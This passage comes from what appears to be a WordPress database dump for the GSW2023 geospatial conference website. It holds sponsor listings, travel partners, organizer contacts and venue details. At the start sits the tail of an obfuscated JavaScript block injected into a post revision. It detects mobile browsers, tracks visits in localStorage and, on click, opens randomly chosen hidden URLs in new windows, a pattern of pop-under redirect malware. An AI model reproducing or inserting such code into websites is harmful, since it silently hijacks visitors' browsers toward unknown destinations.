)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-30 17:25:10','2023-08-30 17:25:10','',3066,'https://gsw2023.com/?p=5441',0,'revision','',0),
(5442,1,'2023-08-30 17:26:55','2023-08-30 17:26:55','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: 